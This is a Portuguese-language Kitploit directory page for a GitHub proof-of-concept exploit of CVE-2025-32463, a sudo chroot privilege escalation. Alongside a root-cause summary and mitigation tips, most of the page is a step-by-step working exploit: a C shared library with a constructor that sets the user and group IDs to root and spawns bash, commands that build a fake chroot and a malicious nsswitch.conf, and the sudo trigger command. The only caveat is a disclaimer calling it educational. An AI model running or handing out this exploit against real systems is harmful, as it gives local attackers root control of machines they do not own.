Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32463-EXPLOIT — Um exploit PoC para CVE-2025-32463 - Escalação de Privilégios no Sudo | Kitploit
Ferramentas/GitHubGitHub/k3ystr0k3r/cve-2025-32463-exploit
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoShellcodeTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de PayloadsExploração de Binários
GitHubk3ystr0k3r/cve-2025-32463-exploit

CVE-2025-32463-EXPLOIT

Um exploit PoC para CVE-2025-32463 - Escalação de Privilégios no Sudo

Ver Repositório
924há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-32463 - Escalação de Privilégio no Sudo

Existe uma vulnerabilidade de escalação de privilégio no sudo que afeta sistemas baseados em Linux/Unix. A falha surge devido à validação inadequada de caminho quando o sudo é usado com a opção -R (--chroot), permitindo que atacantes escalem para root através do carregamento malicioso de bibliotecas NSS.

Causa Raiz

  • Quando o sudo executa um comando dentro de um ambiente chroot (opção -R), ele lida incorretamente com o carregamento de bibliotecas NSS (Name Service Switch) durante condições de erro.
  • A validação inadequada de caminho (por exemplo, não sanitizar LD_LIBRARY_PATH ou caminhos em /etc/nsswitch.conf) pode levar ao carregamento de uma biblioteca maliciosa em vez da biblioteca NSS legítima (ex.: libnss_files.so).
  • Isso resulta em execução arbitrária de código com privilégios de root.

Impacto

  • Atacantes com acesso local podem explorar isso para obter privilégios de root.

Mitigação

  1. Atualize o sudo para a versão corrigida mais recente.
  2. Restrinja as permissões do sudo (limite o uso de chroot quando possível).
  3. Audite as variáveis de ambiente:
    • Restrinja LD_LIBRARY_PATH.
    • Proteja /etc/nsswitch.conf.
  4. Imponha secure_path no /etc/sudoers para limitar os caminhos de busca de bibliotecas.

Detalhes Técnicos

ComponenteGatilho da Vulnerabilidade
sudo -RValidação incorreta do caminho chroot.
NSSCarregamento inseguro de bibliotecas durante erros.
ExploitSequestro de caminho → Carregamento de biblioteca maliciosa.

Visão Geral da Vulnerabilidade

ID CVE: CVE-2025-32463
Versões Afetadas: Sudo 1.9.14 a 1.9.17
Pontuação CVSS: 9.8 (Crítico)
Impacto: Escalação local de privilégio para root

Fluxo do Ataque

  1. Atacante cria biblioteca NSS maliciosa
  2. Configura ambiente chroot falso
  3. Dispara condição de erro no sudo
  4. Sudo carrega biblioteca controlada pelo atacante
  5. Código malicioso é executado com privilégios de root

Passos do Exploit

Passo 1: Verificar vulnerabilidade

Se responder com No such file or directory então está vulnerável: sudo -R invalid invalid sudo: invalid: No such file or directory

Passo 2: Criar Espaço de Trabalho Temporário

Primeiro, criamos um diretório temporário para trabalhar: TMP_DIR=$(mktemp -d -t sudobridge.XXXXXX) cd $TMP_DIR Isso cria um diretório temporário com nome único e navega para dentro dele. O comando mktemp garante que não interferimos com arquivos existentes do sistema.

Passo 3: Criar Biblioteca Maliciosa

Precisamos criar um arquivo C (bridge90.c) que será compilado em uma biblioteca maliciosa:

root@kitploit:~
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void bridge(void) {
  setreuid(0,0);  // Define o ID de usuário real e efetivo como root
  setregid(0,0);  // Define o ID de grupo real e efetivo como root
  chdir("/");     // Muda para o diretório raiz
  execl("/bin/sh", "sh", "-c", "/bin/bash", NULL);  // Executa o shell
}

Componentes principais:

root@kitploit:~
__attribute__((constructor)) garante que a função seja executada quando a biblioteca é carregada

setreuid e setregid escalam privilégios para root

execl inicia um bash shell

Passo 4: Configurar Ambiente do Exploit

mkdir -p bridge/etc echo "passwd: /bridge90" > bridge/etc/nsswitch.conf cp /etc/group bridge/etc/ mkdir libnss_ gcc -shared -fPIC -Wl,-init,bridge -o libnss_/bridge90.so.2 bridge90.c Detalhamento:

root@kitploit:~
Cria um ambiente chroot falso em bridge/etc

Modifica nsswitch.conf para apontar para nosso caminho malicioso

Copia o arquivo /etc/group real para manter a legitimidade

Cria um diretório para nossa biblioteca maliciosa

Compila o código C em uma biblioteca compartilhada nomeada conforme as convenções do NSS (Name Service Switch)

Passo 5: Executar o Exploit

sudo -R bridge bridge

Este comando tenta usar nosso ambiente criado:

root@kitploit:~
O primeiro bridge é o diretório chroot contendo nossa configuração maliciosa

O segundo bridge é o comando a ser executado (que carregará nossa biblioteca)

Passo 6: Verificar Escalação de Privilégio

Após a exploração bem-sucedida, verifique o acesso root:

whoami # Deve retornar "root" id -u # Deve retornar "0" (UID do root)

root@kitploit:~
graph LR
    A[Malicious Library] --> B[Fake Chroot]
    B --> C[Trigger Error]
    C --> D[Library Load]
    D --> E[Root Execution]

Aviso Legal

Este PoC de exploração é apenas para fins educacionais! Não sou responsável por qualquer uso indevido que você possa causar com esta exploração!

Baixar ferramenta